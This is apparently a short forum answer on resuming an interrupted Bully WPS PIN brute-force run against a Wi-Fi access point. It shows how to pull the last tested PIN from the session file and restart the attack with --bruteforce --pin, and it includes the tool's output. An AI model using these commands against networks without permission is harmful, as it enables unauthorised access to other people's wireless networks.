Locate the last PIN tested from the storage progress file (the first number in the last line until the ":"): $ tail /root/.bully/112233445566.run
$ tail /root/.bully/112233445566.run
# session ended 2014-04-27 03:08:48 with signal 2
63370002:63370002:1::
You can extract it directly by using cut
:
$ tail /root/.bully/112233445566.run -n 1 | cut -d ":" -f 1
63370002
And continue from there:
$ sudo bully mon0 --bssid 11:22:33:44:55:66 -v 3 --bruteforce --pin 63370002
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'AA:BB:CC:DD:EE:FF' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '11:22:33:44:55:66' on channel '6'
[+] Got beacon for 'NoamChomsky' (11:22:33:44:55:66)
[!] Restoring session from '/root/.bully/8c0ca32a2751.run'
[+] Index of starting pin number is '63370002'
[+] Last State = 'NoAssoc' Next pin '63370002'
[+] Rx( M7 ) = 'Pin2Bad' Next pin '63370003'
[+] Rx( M7 ) = 'Pin2Bad' Next pin '63370004'
I don't think that the "Restoring session" message makes any sense here, but anyway you can solve the problem.